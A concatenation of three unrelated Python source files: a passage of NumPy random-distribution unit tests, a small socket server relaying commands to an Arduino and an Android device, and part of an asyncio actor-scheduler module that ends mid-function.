assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258])
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763])
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629])
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
random = Generator(MT19937(self.seed))
desired = np.array([0.04714867120827, 0.1239390327694])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589])
random = Generator(MT19937(self.seed))
actual = random.chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399])
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983])
random = Generator(MT19937(self.seed))
actual = random.standard_t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326])
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa)
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013])
random = Generator(MT19937(self.seed))
actual = random.pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807])
random = Generator(MT19937(self.seed))
actual = random.power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202])
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081])
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397])
random = Generator(MT19937(self.seed))
actual = random.logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276])
random = Generator(MT19937(self.seed))
lognormal = random.lognormal
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499])
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864])
random = Generator(MT19937(self.seed))
actual = random.wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326])
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
binom = random.binomial
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
actual = random.binomial(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 2, 1], dtype=np.int64)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
lam = [1]
bad_lam_one = [-1]
desired = np.array([0, 0, 3])
random = Generator(MT19937(self.seed))
max_lam = random._poisson_lam_max
bad_lam_two = [max_lam * 2]
poisson = random.poisson
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
desired = np.array([1, 8, 1])
random = Generator(MT19937(self.seed))
zipf = random.zipf
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([1, 1, 3])
random = Generator(MT19937(self.seed))
geometric = random.geometric
actual = geometric(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geometric, bad_p_one * 3)
assert_raises(ValueError, geometric, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two)
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two)
random = Generator(MT19937(self.seed))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2**30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2**31, 50)
assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
desired = np.array([1, 1, 1])
random = Generator(MT19937(self.seed))
logseries = random.logseries
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]],
[[1, 0, 1, 0, 2, 1],
[7, 2, 2, 1, 4, 4]],
[[0, 2, 0, 1, 2, 0],
[3, 2, 3, 3, 4, 5]]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6)
desired = np.array([[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(Generator(MT19937(s)), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(Generator(MT19937(s)), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_integers(self, endpoint):
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
|
PCV3.py
|
import socket
import select
import sys
import threading
from sendImg import *
class PCV3:
def __init__(self):
self.host = "192.168.16.16"
self.port = 9123
self.connected = False
def connect(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print("Socket established successfully.")
try:
self.socket.bind((self.host, self.port))
print("Socket binded successfully.")
except socket.error as e:
print("Socket binding failed: %s" %str(e))
sys.exit()
self.socket.listen(3)
print("Waiting for PC connection...")
self.client_socket, self.address = self.socket.accept()
print("PC connected successfully.")
self.connected = True
def connectImg(self):
self.sendImg = sendImg()
def disconnect(self):
try:
self.socket.close()
self.socket = None
print("Disconnected from PC successfully.")
except Exception as e:
print("Failed to disconnect from PC: %s" %str(e))
self.connected = False
def readThread(self, arduino, android):
while True:
try:
messages = self.client_socket.recv(1024)
if not messages:
print("PC disconnected remotely.")
self.disconnect()
return
test = messages.split(b'\r\n')
for message in test:
print("Read from PC: %s" %str(message))
if len(message) <= 1:
continue
if (message[0] == 65): # prefix b'A': forward payload to the Arduino
arduino.write(message[1:] + '\n'.encode("utf-8"))
continue
if (message[0] == 82 and message[1] == 80): # prefix b'RP': photo request
threading.Thread(target=self.sendImg.takePic).start()
continue
if (message[0] == 68): # prefix b'D': forward payload to the Android device
android.write(message[1:] + '\n'.encode("utf-8"))
continue
except socket.error as e:
print("Failed to read from PC: %s" %str(e))
self.disconnect()
return
except IOError as ie:
print("Failed to read from PC: %s" %str(ie))
except Exception as e2:
print("Failed to read from PC: %s" %str(e2))
self.disconnect()
return
def write(self, message):
try:
self.client_socket.sendall(message) # connected TCP socket: sendall, not sendto
print("Write to PC: %s" %str(message))
print()
except ConnectionResetError:
self.disconnect()
except socket.error:
self.disconnect()
except IOError as e:
print("Failed to write to PC: %s" %str(e))
|
core.py
|
import asyncio
import itertools
import uuid
from dataclasses import dataclass
from enum import Enum
from itertools import chain
from queue import Empty, Queue
from threading import Thread
from typing import TYPE_CHECKING, Any, Callable, Dict, Iterable, List, Type
from structlog import get_logger
from .bases import TaskPropertyBase
from .distributed_apis import DEFAULT_DIST_API_KEY, get_dist_api
from .exceptions import ActorListenBreaker, ActorPoisoned, NotEnoughResourcesToContinue
from .exchange import CapsetExchange
from .resource_handling import Capability, CapabilitySet, NumStore
if TYPE_CHECKING:
from .bases import ActorBase, DistAPIBase # pragma: no cover
POISON_KEY = frozenset([]) # just make sure it comes before any other
POISON_PILL = None
ALLOWED_CONSUMER_FAILS = 5
def _start_loop(loop: asyncio.AbstractEventLoop) -> None:
asyncio.set_event_loop(loop)
loop.run_forever()
def _get_loop_of_daemon():
loop = asyncio.new_event_loop()
Thread(target=_start_loop, args=(loop,), daemon=True).start()
return loop
class Scheduler:
def __init__(
self,
actor_dict: Dict[CapabilitySet, Type["ActorBase"]],
resource_limits: Dict[Enum, float],
distributed_system: str = DEFAULT_DIST_API_KEY,
verbose=False,
) -> None:
"""Core scheduler class
default reorganize when:
- new tasks are added
- no new task can be consumed
-
"""
self._result_queue = Queue()
self._active_async_tasks = set()
self._task_queues: Dict[CapabilitySet, TaskQueue] = {}
self._loop = _get_loop_of_daemon()
self._verbose = verbose
self._dist_api: DistAPIBase = get_dist_api(distributed_system)()
self._actor_sets: Dict[CapabilitySet, ActorSet] = {}
self._run(self._add_actor_sets(actor_dict))
self._capset_exchange = CapsetExchange(actor_dict.keys(), resource_limits)
# TODO
# concurrent_task_limit: Callable[[List[TaskPropertyBase]], bool]
# self._active_task_properties = ActiveTaskPropertySet()
# self._task_limiter = concurrent_task_limit
def __del__(self):
try:
self._dist_api.join()
except AttributeError: # pragma: no cover
pass
def process(
self,
batch_producer: Callable[[], List["SchedulerTask"]],
result_processor=None,
min_queue_size: int = 0,
):
while True:
is_done = self.is_idle
(result_processor or list)(self.get_processed_results())
next_batch = batch_producer()
batch_size = len(next_batch)
empty_batch = batch_size == 0
self._log("new batch", size=batch_size, was_done=is_done)
if is_done and empty_batch:
break
if empty_batch:
self.wait_until_n_tasks_remain(0)
continue
self.refill_task_queue(next_batch)
try:
self.wait_until_n_tasks_remain(min_queue_size)
except KeyboardInterrupt: # pragma: no cover
self._log(f"Interrupted waiting for {self}")
break
def refill_task_queue(self, task_batch: Iterable["SchedulerTask"]):
self._run(self._refill_task_queue(task_batch))
def wait_until_n_tasks_remain(self, remaining_tasks: int = 0):
self._run(self._await_until(remaining_tasks))
def join(self):
self.wait_until_n_tasks_remain(0)
self._run(self._drain_all_actor_sets())
try:
self._run(asyncio.wait(self._all_actors))
except AssertionError:
pass
self._run(self._cleanup())
self._dist_api.join()
def get_processed_results(self) -> Iterable:
while True:
try:
yield self._result_queue.get(False)
except Empty:
break
@property
def is_empty(self) -> bool:
return self.is_idle and self._result_queue.empty()
@property
def is_idle(self) -> bool:
return not self._active_async_tasks
@property
def queued_task_count(self):
return sum([tq.size for tq in self._task_queues.values()])
def _run(self, coro, wait=True):
fut = asyncio.run_coroutine_threadsafe(coro, self._loop)
if wait:
fut.result()
def _log(self, logstr, **kwargs):
if self._verbose:
get_logger(
api=type(self._dist_api).__name__,
queued=self.queued_task_count,
working=self._running_consumer_count,
).info(logstr, **kwargs)
def _q_of_new_capset(self, capset: CapabilitySet) -> asyncio.Queue:
new_task_queue = TaskQueue()
self._task_queues[capset] = new_task_queue
for task_cs, task_queue in self._task_queues.items():
if task_cs > capset:
task_queue.reset_ping()
return new_task_queue
async def _add_actor_sets(self, actor_dict):
self._actor_sets = {
capset: ActorSet(
actor_cls,
self._dist_api,
capset,
self._task_queues,
self._verbose,
)
for capset, actor_cls in actor_dict.items()
}
async def _refill_task_queue(self, task_batch: Iterable["SchedulerTask"]):
for scheduler_task in task_batch:
await self._add_task(scheduler_task)
await self._reorganize_actors()
async def _add_task(self, scheduler_task: "SchedulerTask"):
coro = self._await_future_and_put_result_to_queue(scheduler_task)
async_task = self._loop.create_task(coro)
self._active_async_tasks.add(async_task)
capset = scheduler_task.requirements
q = self._task_queues.get(capset) or self._q_of_new_capset(capset)
await q.put(scheduler_task)
async def _await_future_and_put_result_to_queue(
self, scheduler_task: "SchedulerTask"
):
scheduler_task.init_future()
task_result: TaskResult = await scheduler_task.future
self._result_queue.put(task_result.value)
if task_result.is_last_in_queue and self.queued_task_count:
await self._reorganize_actors()
async def _reorganize_actors(self):
"""optimize actor set sizes
target: minimize max n(tasks<=capset) / n(actors>=capset)
for all task queue capsets
limit: capset resource use * n_actors <=total resource avail
for all actorset capsets
heuristic:
value of adding: decrease caused in target / number possible remaining
"""
need_dic = {cs: t.size for cs, t in self._task_queues.items()}
new_needs = NumStore(need_dic)
new_ideals = self._capset_exchange.set_values(new_needs)
self._log(f"reorganizing on {need_dic}")
self._log(f"reorganizing to {new_ideals}")
for cs, new_ideal in new_ideals.items():
await self._actor_sets[cs].set_running_actors_to(new_ideal)
dead_end = self.queued_task_count and self._capset_exchange.idle
if dead_end:
await self._cleanup()
await self._cancel_remaining_tasks()
raise NotEnoughResourcesToContinue(
f"{self.queued_task_count} remaining and no launchable actors"
)
async def _await_until(self, remaining_tasks: int = 0):
return_when = "FIRST_COMPLETED" if remaining_tasks > 0 else "ALL_COMPLETED"
while len(self._active_async_tasks) > remaining_tasks:
done, _ = await asyncio.wait(
self._active_async_tasks, return_when=return_when
)
self._active_async_tasks.difference_update(done)
await self._reorganize_actors()
async def _drain_all_actor_sets(self):
for actor_set in self._actor_sets.values():
await actor_set.drain_to(0)
async def _cleanup(self):
for aset in self._actor_sets.values():
aset.poison_queue.cancel()
for t_queue in self._task_queues.values():
t_queue.cancel()
async def _cancel_remaining_tasks(self):
for atask in self._active_async_tasks:
atask.cancel()
@property
def _running_consumer_count(self):
return sum([aset.running_actor_count for aset in self._actor_sets.values()])
@property
def _all_actors(self):
return itertools.chain(
*[aset.all_actor_tasks for aset in self._actor_sets.values()]
)
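# --- Illustrative usage sketch (not part of the original file) ---
# Assuming a hypothetical ActorBase subclass `EchoActor` and a Capability
# enum member `CPU` defined elsewhere in the package:
#
# sched = Scheduler(
#     actor_dict={CapabilitySet([CPU]): EchoActor},
#     resource_limits={CPU: 4},
# )
# sched.refill_task_queue([SchedulerTask(i, [CPU]) for i in range(10)])
# sched.wait_until_n_tasks_remain(0)
# results = list(sched.get_processed_results())
# sched.join()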
class TaskQueue:
def __init__(self) -> None:
self.queue = asyncio.Queue()
self.getting_task: asyncio.Task = asyncio.create_task(self.queue.get())
self.ping = asyncio.Future()
self.put = self.queue.put
def reset_ping(self):
self.ping.set_result(None)
self.ping = asyncio.Future()
def pop(self):
out = self.getting_task.result()
self.getting_task = asyncio.create_task(self.queue.get())
return out
@property
def cancel(self):
return self.getting_task.cancel
@property
def done(self):
return self.getting_task.done
@property
def size(self):
return self.queue.qsize() + int(self.getting_task.done())
@property
def tasks(self):
return [self.ping, self.getting_task]
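# Note (illustrative): TaskQueue keeps one pre-armed queue.get() task so a
# consumer can asyncio.wait() over many queues at once; after the wait,
# done() identifies which queue fired and pop() returns the item while
# re-arming the getter for the next round.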
class ActorSet:
def __init__(
self,
actor_cls: Type["ActorBase"],
dist_api: "DistAPIBase",
capset: CapabilitySet,
task_queues: Dict[CapabilitySet, TaskQueue],
debug: bool,
) -> None:
self.actor_cls = actor_cls
self.dist_api = dist_api
self.capset = capset
self.poison_queue = TaskQueue()
self._poisoning_done_future = asyncio.Future()
self._task_queues = task_queues
self._actor_listening_async_task_dict: Dict[str, asyncio.Task] = {}
self._debug = debug
def __repr__(self):
dic_str = [f"{k}={v}" for k, v in self._log_dic.items()]
return f"{type(self).__name__}({', '.join(dic_str)}"
async def set_running_actors_to(self, target_count):
if target_count < self.running_actor_count:
await self.drain_to(target_count)
elif target_count > self.running_actor_count:
for _ in range(self.running_actor_count, target_count):
await self.add_new_actor()
async def drain_to(self, target_count: int) -> int:
n = 0
for _ in range(target_count, self.running_actor_count):
n += 1
await self.poison_queue.put(POISON_PILL)
await self._poisoning_done_future
self._poisoning_done_future = asyncio.Future()
return n
async def add_new_actor(self):
running_actor = self.dist_api.get_running_actor(actor_cls=self.actor_cls)
listener_name = uuid.uuid1().hex
coroutine = self._listen(
running_actor=running_actor,
name=listener_name,
)
task = asyncio.create_task(coroutine, name=listener_name)
self._log("adding consumer", listener_task=task.get_name())
self._actor_listening_async_task_dict[listener_name] = task
@property
def task_count(self):
return sum([q.size for q in self._task_queues.values()])
@property
def running_actor_count(self):
return len(self._actor_listening_async_task_dict)
@property
def all_actor_tasks(self):
return self._actor_listening_async_task_dict.values()
async def _listen(self, running_actor: "ActorBase", name: str):
self._log(
"consumer listening",
running=type(running_actor).__name__,
)
fails = 0
while True:
next_task = await self._get_next_task()
try:
fails = await self._process_task(running_actor, next_task, fails)
except ActorListenBreaker as e:
self._log(
"stopping consumer",
reason=e,
running=type(running_actor).__name__,
)
self.dist_api.kill(running_actor)
del self._actor_listening_async_task_dict[name]
self._poisoning_done_future.set_result(True)
if not isinstance(e, ActorPoisoned):
await self.add_new_actor()
return
async def _get_next_task(self) -> "SchedulerTask":
while True:
await asyncio.wait(
self._wait_on_tasks,
